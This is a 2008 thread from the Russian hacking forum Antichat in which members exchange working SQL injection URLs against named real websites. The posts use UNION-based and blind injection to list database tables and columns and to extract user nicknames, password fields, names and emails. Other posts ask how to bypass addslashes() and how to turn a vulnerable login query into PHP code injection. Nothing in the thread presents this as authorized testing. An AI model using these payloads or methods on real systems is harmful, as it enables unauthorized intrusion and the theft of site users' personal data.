Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
30.06.2008, 15:09
|
|
Постоянный
Регистрация: 30.12.2006
Сообщений: 434
Провел на форуме:
849583
Репутация:
210
|
|
Мистерео
http://www.oke.ru/xo4u.php?id=146432+and+1=2+UNION+SELECT+1,2,versio n(),4,user(),6,7,8,9,10+FROM+chausers/*
3 и 5 - "Рабочие столбцы", именно их выводит скрипт
5.1.16-beta-log
gsokecomru@localhost
а так все выводит
Пример
http://www.oke.ru/xo4u.php?id=146432+and+1=2+UNION+SELECT+1,2,777777 77777,4,user(),6,7,8,9,10+FROM+chausers/*
Последний раз редактировалось Naydav; 30.06.2008 в 15:19..
|
|
|
30.06.2008, 15:11
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
Сообщение от Мистерео
но ниче не выводит
Как понять не выводится? А надпись "фанатик" жирным шрифтом тебя не настораживает? 
В этой таблице инфа которую юзеры пишут в комментариях, что ты там хочешь найти?
|
|
|
|
30.06.2008, 15:14
|
|
Познающий
Регистрация: 07.08.2006
Сообщений: 66
Провел на форуме:
2256830
Репутация:
94
|
|
ну так в 3 какраз стоит запрос на nick и passw но скрипт не хочет их показывать.
Все спс
|
|
|
|
30.06.2008, 16:15
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552
Репутация:
568
|
|
Мистерео
http://www.oke.ru/
xo4u.php?id=146432+and+1=2+union+select+1,2,3,unhe x(hex(concat_ws(0x3a,version(),database(),user())) ),5,6,7/*
не знаю как у вас а у меня вообще 7 колонок..))
http://www.oke.ru/xo4u.php?id=146432+and+1=2+union+select+1,2,3,unhe x(hex(concat_ws(0x3a,table_name,table_schema))),5, 6,7+from+information_schema.tables+limit+30,1/*
нету там вобше ничего в бд.) 4 поломаные таблицы information_schema и oke.chausers.
http://www.oke.ru/xo4u.php?id=146432+and+1=2+union+select+1,2,3,unhe x(hex(concat_ws(0x3a,column_name,table_name,table_ schema))),5,6,7+from+information_schema.columns+wh ere+table_name=0x6368617573657273/*
достаем колонки данной таблицы.)
http://www.oke.ru/xo4u.php?id=146432+and+1=2+union+select+1,2,3,unhe x(hex(concat_ws(0x3a,id,nick,passw))),5,6,7+from+o ke.chausers/*
тут мы получаем id и nick тех людей которые пишут коменты...) а где ты там вобше login увидел? тоесть колонка passw - пустая.
http://www.oke.ru/xo4u.php?id=146432+and+1=2+union+select+1,2,3,unhe x(hex(concat_ws(0x3a,id,name,email,0x3a3a,want))), 5,6,7+from+wants/*
намного интереснее будет почитать желания..))
Последний раз редактировалось sabe; 30.06.2008 в 16:31..
|
|
|
|
30.06.2008, 21:07
|
|
Постоянный
Регистрация: 11.11.2006
Сообщений: 834
Провел на форуме:
3941248
Репутация:
668
|
|
Есть способ обхода addslashes() ?
еси там чтото типо
"select ..bla... id = \"$_GET['bla']\""
Последний раз редактировалось Doom123; 30.06.2008 в 21:14..
|
|
|
|
30.06.2008, 22:21
|
|
Постоянный
Регистрация: 24.05.2008
Сообщений: 589
Провел на форуме:
3629857
Репутация:
504
|
|
хм.. может попробовать закрыть кавычки с тем же бэкслэшем? если можно линку, то я подумаю.. просто не могу я думать, смотря на голые мускульнуе запросы=)
|
|
|
|
30.06.2008, 22:43
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
http://www.idshop.ro/index.php?main_page=index&cPath=9999999999999'
|
|
|
|
01.07.2008, 06:09
|
|
Постоянный
Регистрация: 24.05.2008
Сообщений: 589
Провел на форуме:
3629857
Репутация:
504
|
|
хм.. даже и не понял как там что то можно реализовать... ведь то что выводится ошибка после подстановки кавычки еще не осначает что есть возможность проведения инъекции.. может быть просто в скрипт передано неправильное значение, вот он и ругается, а попытки что то из этого выжать провалились с треском.. по крайней мере у меня..
|
|
|
|
01.07.2008, 08:34
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734
Репутация:
1917
|
|
Сообщение от Gorev
http://www.idshop.ro/index.php?main_page=index&cPath=9999999999999'
ну например можно слепую инъекцию использовать:
Код:
http://www.idshop.ro/index.php?main_page=index&cPath=9999999999999' WHERE tracking_id=134205 or if ((select 1)=1,1,(select 1 union select 2))=1%23
для закомментирования надо использовать решетку (%23)
но на самом деле там есть скули с выводом
__________________
Карфаген должен быть разрушен...
|
|
|
|
01.07.2008, 21:45
|
|
Новичок
Регистрация: 30.05.2008
Сообщений: 4
Провел на форуме:
6739
Репутация:
0
|
|
есть следующая страничка
Код:
<?
$query="select * from spisok_users where user_name='$login' and password='$password'";
$result=mysql_query($query, $db);
$row=mysql_num_rows($result);?>
так вот можно ли как то изменить ее чтобы сделать из php-инъекцию?
пробывал
?password='%22;echo%22ghbdtn%22;exit;
или такое вообще не возможно? |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
